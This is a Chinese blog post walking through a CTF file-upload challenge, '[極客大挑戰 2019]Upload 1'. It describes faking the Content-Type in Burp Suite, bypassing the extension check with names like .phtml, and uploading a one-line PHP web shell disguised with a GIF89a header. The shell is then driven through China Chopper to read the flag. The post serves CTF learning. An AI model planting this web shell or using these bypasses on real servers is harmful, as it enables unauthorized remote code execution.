文件上傳漏洞

例題為:[極客大挑戰(zhàn) 2019]Upload 1

1、該題提示為圖片上傳,所以提示文件類型是 image/jpeg

2、所以我們用burpsuite做代理將文件類型更改,達到上傳一句話木馬的目的。

3、新建文件名為123.php的文件


4、嘗試上傳


此時應(yīng)更改文件類型,將下圖所示的文件類型改為imag/jpeg

如圖所示:


發(fā)現(xiàn)提示信息為:

所以我們猜測有文件后綴名檢測。

常見的繞過文件后綴名檢測的寫法:

php,php3,php4,php5,phtml,Php?

那么我們就更改文件名,改為2.phtml

所用的一句話為:GIF89a? <script language="php">eval($_REQUEST[shell])</script>

目的是繞過php檢測


然后我們用菜刀連接


在虛擬終端中輸入:cat /flag 即可查看找到flag


?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 前言: 實習(xí)工作以后,我才發(fā)現(xiàn)自己對于滲透測試還沒形成自己的測試體系,對于一些常見的漏洞測試方法了解得不夠全,更加...
    book4yi閱讀 2,450評論 0 3
  • 文件上傳漏洞可以說是日常滲透測試用得最多的一個漏洞,因為用它獲得服務(wù)器權(quán)限最快最直接。但是想真正把這個漏洞利用好卻...
    Splunker閱讀 328評論 0 0
  • 文件上傳漏洞: 1.本地驗證 本地驗證:客戶端本地通過前臺JS腳本進行檢測。 原理: 當(dāng)用戶在客戶端選擇文件點擊上...
    xaviershun閱讀 1,454評論 0 1
  • 文件上傳漏洞類型分類 如何判斷上傳漏洞類型? 本次實現(xiàn)使用的靶場系統(tǒng)是upload-labs upload-la...
    Admin3K閱讀 1,282評論 0 2
  • 推薦指數(shù): 6.0 書籍主旨關(guān)鍵詞:特權(quán)、焦點、注意力、語言聯(lián)想、情景聯(lián)想 觀點: 1.統(tǒng)計學(xué)現(xiàn)在叫數(shù)據(jù)分析,社會...
    Jenaral閱讀 6,033評論 0 5

友情鏈接更多精彩內(nèi)容